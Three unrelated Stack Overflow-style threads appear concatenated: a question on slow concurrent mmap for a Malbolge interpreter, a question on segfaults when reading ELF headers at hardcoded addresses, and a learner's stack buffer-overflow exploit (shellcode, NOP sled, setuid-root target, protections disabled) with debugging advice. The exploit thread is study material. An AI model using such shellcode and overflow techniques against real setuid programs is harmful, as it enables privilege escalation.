We're currently facing a somewhat complex problem with mmap performance on our Linux server.
We use a server with 64-core AMD Opteron 6374 and 128GiB of RAM. Here, we created a qemu virtual machine with the same core count and 64GiB of RAM. We use it for unit-testing a program I wrote. There are around 60 unit tests that run in parallel, each of which allocates a little over 1GiB of RAM. Because the process memory compresses really well, we decided to enable Zram. During our tests, the memory usage dropped to around 300MiB for each process, which is a significant gain, at a relatively small performance loss (the swap area stays in physical memory).
Currently, with our tests, we don't swap just yet, but we've observed very poor mmap performance. A single call to mmap, from our testing, could take up to 7 minutes (without swapping, of course; allocating maybe somewhere between 2MBps-20MBps of memory). Sometimes, though all mmaps on all the 60 processes are nearly instant and the processes allocate the required gigabyte of RAM. We watch them allocating tiny amounts of memory per second in real time, though:
The program I wrote follows:
// CC0, inspired by dzaima's code, which was inspired by my code.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <signal.h>
#include <unistd.h>
#define u8 uint8_t
#define i32 int32_t
#define u32 uint32_t
#define i64 int64_t
#define u64 uint64_t
#define C const
#define P static
#define _(a...) {return({a;});}
#define F_(n,a...) for(int i=0;i<n;i++){a;}
#define F1(n,x,a...) for(i32 i=0;i<n;i+=x){a;}
#define INLINE P inline __attribute__((always_inline))
#define assert(X) if(!(X))__builtin_unreachable();
#define LKL(c) __builtin_expect((c),1)
typedef u32 W;
#define SZ 19
#define END 1162261467ULL
P C u8 crz[]={1,0,0,9,1,0,2,9,2,2,1},crz2[]={4,3,3,1,0,0,1,0,0,9,9,9,9,9,9,9,4,3,5,1,0,2,1,0,2,9,9,9,9,9,9,9,5,5,4,2,2,1,2,2,1,9,9,9,9,9,9,9,4,3,3,1,0,0,7,6,6,9,9,9,9,9,9,9,4,3,5,1,0,2,7,6,8,9,9,9,9,9,9,9,5,5,4,2,2,1,8,8,7,9,9,9,9,9,9,9,7,6,6,7,6,6,4,3,3,9,9,9,9,9,9,9,7,6,8,7,6,8,4,3,5,9,9,9,9,9,9,9,8,8,7,8,8,7,5,5,4,9,9,9,9,9,9,9};
#define UNR_CRZ(trans,sf1,sf2)W am=a%sf1,ad=a/sf1,dm=d%sf1,dd=d/sf1;r+=k*trans[am+sf2*dm];a=ad;d=dd;k*=sf1;
INLINE W mcrz(W a, W d){W r=0,k=1;
#pragma GCC unroll 16
F_(SZ/2,UNR_CRZ(crz2,9,16))if(SZ&1){UNR_CRZ(crz,3,4)}return r;}
INLINE W mrot(W x)_(W t=END/3,b=x%t,m=b%3,d=b/3;d+m*(t/3)+(x-b))
P u64 pgsiz;
P W*mem,pat[6];
P void mpstb(void*b,u64 l){mmap(b,l,PROT_READ|PROT_WRITE,MAP_POPULATE|MAP_PRIVATE|MAP_ANON|MAP_FIXED,-1,0);}
P void sigsegvh(int n,siginfo_t*si,void*_) {
void*a=si->si_addr,*ab=(void*)((u64)a&~(pgsiz-1));mpstb(ab, pgsiz);
W* curr=ab;i64 off=(curr-mem)%(END/3);F1(pgsiz,sizeof(W),*curr++=pat[off++%6]);}
P u64 rup(u64 v)_(((v-1)&~(pgsiz-1))+pgsiz)
#define RDS 65536
__attribute__((hot,flatten))int main(int argc, char* argv[]){
pgsiz=sysconf(_SC_PAGESIZE);mem=mmap(NULL,END*sizeof(W),PROT_NONE,MAP_NORESERVE|MAP_PRIVATE|MAP_ANON,-1,0);
struct sigaction act;memset(&act,0,sizeof(struct sigaction));act.sa_flags=SA_SIGINFO;act.sa_sigaction=sigsegvh;sigaction(SIGSEGV,&act,NULL);
FILE*f=fopen(argv[1],"rb");fseek(f,0,SEEK_END);u64 S=ftell(f);rewind(f);u64 szR=rup(S),off=0;mpstb(mem, szR*sizeof(W));char data[RDS];
C W a1_off=94-((END-1)/6-29524)%94,a2_off=94-((END-1)/3-59048)%94;while(S){int am=LKL(S>RDS)?RDS:S;fread(&data,1,am,f);
#pragma GCC unroll 32
F_(am,W w=data[i];mem[off++]=w)S-=am;}for(;off<szR;off++)mem[off]=mcrz(mem[off-1],mem[off-2]);
W n2=mem[off-2],n1=mem[off-1];u64 off2=off;F_(6,W n0=mcrz(n1,n2);pat[off2%6]=n0;n2=n1;n1=n0;off2++)W c=0,a=0,*d=mem;
P C int offs[]={0,((i64)a1_off-(i64)(END/3))%94+94,((i64)a2_off-(i64)(2*(END/3))%94+94)};P C void*j[94];F_(94,j[i]=&&INS_DEF)
#define M(n) j[n]=&&INS_##n;
M(4)M(5)M(23)M(39)M(40)M(62)M(68)M(81)
#define BRA {goto*j[(c+mem[c]+offs[c/(END/3)])%94];}
BRA;
#define NXT mem[c] = \
"SOMEBODY MAKE ME FEEL ALIVE" \
"[hj9>,5z]&gqtyfr$(we4{WP)H-Zn,[%\\3dL+Q;>U!pJS72FhOA1CB6v^=I_0/8|jsb9m<.TVac`uY*MK'X~xDl}REokN:#?G\"i#" \
"AND SHATTER ME"[mem[c]];c++;d++;BRA
INS_4:c=*d;NXT;INS_5:putchar(a);fflush(stdout);NXT;
INS_23:;int CR=getchar();a=CR==EOF?END-1:CR;NXT;INS_39:a=*d=mrot(*d);NXT;INS_40:d=mem+*d;NXT;
INS_62:a=*d=mcrz(a, *d);INS_68:NXT;INS_81:return 0;INS_DEF:NXT;
}
It's an interpreter for rotwidth=19 variant of Malbolge Unshackled (compiled with clang fast20.c -w -O3 -march=native -mtune=native -o fast20 -flto -mllvm -polly -fvisibility=hidden, clang -v yields Debian clang version 11.0.1-2). We feed it with the source code of my project (passed as an argument to the program), temporarily available here (provided hoping that it's possible to reproduce our issue; use 7za to unpack).
Each time I want to run the unit tests, i execute the following shell script:
#!/bin/bash
# XXX: `rsync` is slower
echo "[+] sending test data."
cd kiera-tests && \
tar -czf - * | \
ssh kamila#remote \
"cd ~/malbolgelisp && rm -rf tests && mkdir tests && cd tests && tar -xzf -" && \
cd ..
echo "[+] building essential tools."
ssh kamila#remote "cd ~/malbolgelisp/tests && chmod a+x setup.sh && ./setup.sh"
echo "[+] sending malbolgelisp source code..."
tool/mb_nlib d < lisp.mb | \
pv | gzip -6 | \
ssh kamila#remote \
"gunzip | ~/malbolgelisp/tests/mb_nlib e > ~/malbolgelisp/lisp.mb && vmtouch -vt ~/malbolgelisp/lisp.mb"
echo "[+] running the tests..."
ssh kamila#remote "cd ~/malbolgelisp/tests/ && ./test.sh"
I vmtouch the ~300MB file, so it must have stayed in cache across the runs.
/home/kamila/malbolgelisp/lisp.mb
[OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO] 76711/76711
Files: 1
Directories: 0
Touched Pages: 76711 (299M)
Elapsed: 0.071541 seconds
As we've observed, the cached memory shown by bpytop grows up to 500MiB, which means that the file must have been cached. We also reupload the file each time and it changes significantly.
We tried using Valgrind on the interpreter, but it seems to misbehave under this condition for a yet unknown reason. It's easy to deduce what is happening in the code, though:
pgsiz=sysconf(_SC_PAGESIZE);
mem=mmap(NULL,END*sizeof(W),PROT_NONE,MAP_NORESERVE|MAP_PRIVATE|MAP_ANON,-1,0);
first, entire memory area is mapped.
FILE*f=fopen(argv[1],"rb");fseek(f,0,SEEK_END);u64 S=ftell(f);rewind(f);
u64 szR=rup(S),off=0;mpstb(mem, szR*sizeof(W));
then I query the file size (~300MiB, times sizeof(W) = ~1.2GiB), and map eagerly this amount of memory using mpstb:
P void mpstb(void*b,u64 l){
mmap(b,l,PROT_READ|PROT_WRITE,MAP_POPULATE|MAP_PRIVATE|MAP_ANON|MAP_FIXED,-1,0);}
I considered using mprotect, but in the following parts of the code we execute mpstb fairly often, causing IPIs for TLB shootdowns.
the following bit of code can't be a bottleneck, since aside from the I/O it performs (which is happening on a cached file with a relatively big buffer - RDS = 65536 => should be fast) a bunch of mathematical operations which can't take 7 minutes on one run with the same data and a few seconds on the other run with the same data:
C W a1_off=94-((END-1)/6-29524)%94,a2_off=94-((END-1)/3-59048)%94;
while(S){int am=LKL(S>RDS)?RDS:S;fread(&data,1,am,f);
#pragma GCC unroll 32
F_(am,W w=data[i];mem[off++]=w)S-=am;}
for(;off<szR;off++)mem[off]=mcrz(mem[off-1],mem[off-2]);
We've also noticed that in the following test runner which is executed on the server:
#!/bin/bash
for d in b*; do
for f in $d/*.in; do
echo "[+] $f"
(./fast20 ../lisp.mb $f < $f > $f.aout; diff ${f%%.*}.out $f.aout) &
# sleep 3s
done
for job in `jobs -p`; do
wait $job
done
done
uncommenting the # sleep 3s line makes the allocations much faster, meaning that the Linux kernel simply can't handle a dozen of processes mapping a single gigabyte of memory concurrently. we've also seen these messages pop up during our testing: watchdog: BUG: soft lockup - CPU#34 stuck for 24s! that messed up our bpytop view. Some googling reveals that it's printed when the CPU is stuck for too long in the kernel, which would be yet another argument proving that mmap in this example is ridicously slow.
we've also suspected that it might be caused by memory ballooning on qemu, but disabling it made very little difference.
interestingly enough, all the processes seem to slowly and concurrently allocate memory.
the documentation for the lisp interpreter is available here and it can be used to construct test cases - the simplest one being (+ 2 2).
my question follows - can we do something about this bug? are we missing something? i know that running less processes at a time makes it actually bearable (the runtime drops from 30m to 5m), but if not the allocation performance, the tests could easily finish within 40 seconds, which would be a huge improvement. Is it mmap being inherently slow on Linux when called by multiple processes concurrently?
finally, please let me know if we should provide any further details.
By using the objdump command I figured that the address 0x02a8 in memory contains start the path /lib64/ld-linux-x86-64.so.2, and this path ends with a 0x00 byte, due to the C standard.
So I tried to write a simple C program that will print this line (I used a sample from the book "RE for beginners" by Denis Yurichev - page 24):
#include <stdio.h>
int main(){
printf(0x02a8);
return 0;
}
But I was disappointed to get a segmentation fault instead of the expected /lib64/ld-linux-x86-64.so.2 output.
I find it strange to use such a "fast" call of printf without specifiers or at least pointer cast, so I tried to make the code more natural:
#include <stdio.h>
int main(){
char *p = (char*)0x02a8;
printf(p);
printf("\n");
return 0;
}
And after running this I still got a segmentation fault.
I don't believe this is happening because of restricted memory areas, because in the book it all goes well at the 1st try. I am not sure, maybe there is something more that wasn't mentioned in that book.
So need some clear explanation of why the segmentation faults keep happening every time I try running the program.
I'm using the latest fully-upgraded Kali Linux release.
Disappointing to see that your "RE for beginners" book does not go into the basics first, and spits out this nonsense. Nonetheless, what you are doing is obviously wrong, let me explain why.
Normally on Linux, GCC produces ELF executables that are position independent. This is done for security purposes. When the program is run, the operating system is able to place it anywhere in memory (at any address), and the program will work just fine. This technique is called Address Space Layout Randomization, and is a feature of the operating system that nowdays is enabled by default.
Normally, an ELF program would have a "base address", and would be loaded exactly at that address in order to work. However, in case of a position independent ELF, the "base address" is set to 0x0, and the operating system and the interpreter decide where to put the program at runtime.
When using objdump on a position independent executable, every address that you see is not a real address, but rather, an offset from the base of the program (that will only be known at runtime). Therefore it is not possible to know the position of such a string (or any other variable) at runtime.
If you want the above to work, you will have to compile an ELF that is not position independent. You can do so like this:
gcc -no-pie -fno-pie prog.c -o prog
It no longer works like that. The 64-bit Linux executables that you're likely using are position-independent and they're loaded into memory at an arbitrary address. In that case ELF file does not contain any fixed base address.
While you could make a position-dependent executable as instructed by Marco Bonelli it is not how things work for arbitrary executables on modern 64-bit linuxen, so it is more worthwhile to learn to do this with position-independent ones, but it is a bit trickier.
This worked for me to print ELF i.e. the elf header magic, and the interpreter string. This is dirty in that it probably only works for a small executable anyway.
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
int main(){
// convert main to uintptr_t
uintptr_t main_addr = (uintptr_t)main;
// clear bottom 12 bits so that it points to the beginning of page
main_addr &= ~0xFFFLLU;
// subtract one page so that we're in the elf headers...
main_addr -= 0x1000;
// elf magic
puts((char *)main_addr);
// interpreter string, offset from hexdump!
puts((char *)main_addr + 0x318);
}
There is another trick to find the beginning of the ELF executable in memory: the so-called auxiliary vector and getauxval:
The getauxval() function retrieves values from the auxiliary vector,
a mechanism that the kernel's ELF binary loader uses to pass certain
information to user space when a program is executed.
The location of the ELF program headers in memory will be
#include <sys/auxv.h>
char *program_headers = (char*)getauxval(AT_PHDR);
The actual ELF header is 64 bytes long, and the program headers start at byte 64 so if you subtract 64 from this you will get a pointer to the magic string again, therefore our code can be simplified to
#include <stdio.h>
#include <inttypes.h>
#include <sys/auxv.h>
int main(){
char *elf_header = (char *)getauxval(AT_PHDR) - 0x40;
puts(elf_header + 0x318); // or whatever the offset was in your executable
}
And finally, an executable that figures out the interpreter position from the ELF headers alone, provided that you've got a 64-bit ELF, magic numbers from Wikipedia...
#include <stdio.h>
#include <inttypes.h>
#include <sys/auxv.h>
int main() {
// get pointer to the first program header
char *ph = (char *)getauxval(AT_PHDR);
// elf header at this position
char *elfh = ph - 0x40;
// segment type 0x3 is the interpreter;
// program header item length 0x38 in 64-bit executables
while (*(uint32_t *)ph != 3) ph += 0x38;
// the offset is 64 bits at 0x8 from the beginning of the
// executable
uint64_t offset = *(uint64_t *)(ph + 0x8);
// print the interpreter path...
puts(elfh + offset);
}
I guess it segfaults because of the way you use printf: you dont use the format parameter how it is designed to be.
When you want to use the printf function to read data the first argument it takes is a string that will format how the display will work int printf(char *fmt , ...) "the ... represent the data you want to display accordingly to the format string parameter
so if you want to print a string
//format as text
printf("%s\n", pointer_to_beginning_of_string);
//
If this does not work cause it probably will it is because you are trying to read memory that you are not supposed to access.
try adding extra flags " -Werror -Wextra -Wall -pedantic " with your compiler and show us the errors please.
So, to start off with, I am on Kali 2020.1, fully updated. 64 bit.
The source code is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include "hacking.h"
#include <unistd.h>
#include <stdlib.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
long int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start command buffer.
buffer = command + strlen(command); // Set buffer at the end.
if(argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (long int) &i - offset; // Set return address.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
Now, some important clarifications. I included all those libraries because compilation throws warnings without them.
The preceding notetaker and notesearch programs, as well as this exploit_notesearch program have been compiled as follows in the Terminal:
gcc -g -mpreferred-stack-boundary=4 -no-pie -fno-stack-protector -Wl,-z,norelro -z execstack -o exploit_notesearch exploit_notesearch.c
I no longer remember the source which said I must compile this way (the preferred stack boundary was 2 for them, but my machine requires it to be between 4 and 12). Also, the stack is executable now as you can see.
All 3 programs (notetaker, notesearch, and exploit_notesearch) had their permissions modified as in the book:
sudo chown root:root ./program_name
sudo chmod u+s ./program_name
I tried following the solution from this link: Debugging Buffer Overflow Example , but to no avail. Same goes for this link: Not So Fast Shellcode Exploit
Changing the offset incrementally from 0 to 330 by using increments of 1, 10, 20, and 30 in the terminal using a for-loop also did not solve my problem. I keep getting a segmentation fault no matter what I do.
What could be the issue in my case and what would be the best way to overcome said issue? Thank you.
P.S I remember reading that I'm supposed to use 64-bit shellcode instead of the one provided.
When you are segfaulting, it is a great time to run it within a debugger like GDB. It should tell you right where you are crashing, and you can step through the execution and validate the assumptions you are making. The most common segfaults tend to be invalid memory permissions (like trying to execute a non-executable page) or an invalid instruction (eg., if you land in the middle of shellcode, not in a NOP sled).
You are running into a couple of issues trying to convert the exploit to work on 32-bit. When filling the buffer with return addresses, it's using the constant 4 when pointers on 64-bit are actually 8 bytes.
for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;
That could also present some issues when trying to exploit the strcpy bug, because those 64-bit addresses will contain NULL bytes (since the usable address space only uses 6 of the 8 bytes). Thus, if you have some premature NULL bytes before actually overwriting the return address on the stack, you won't actually copy enough data to leverage the overflow as intended.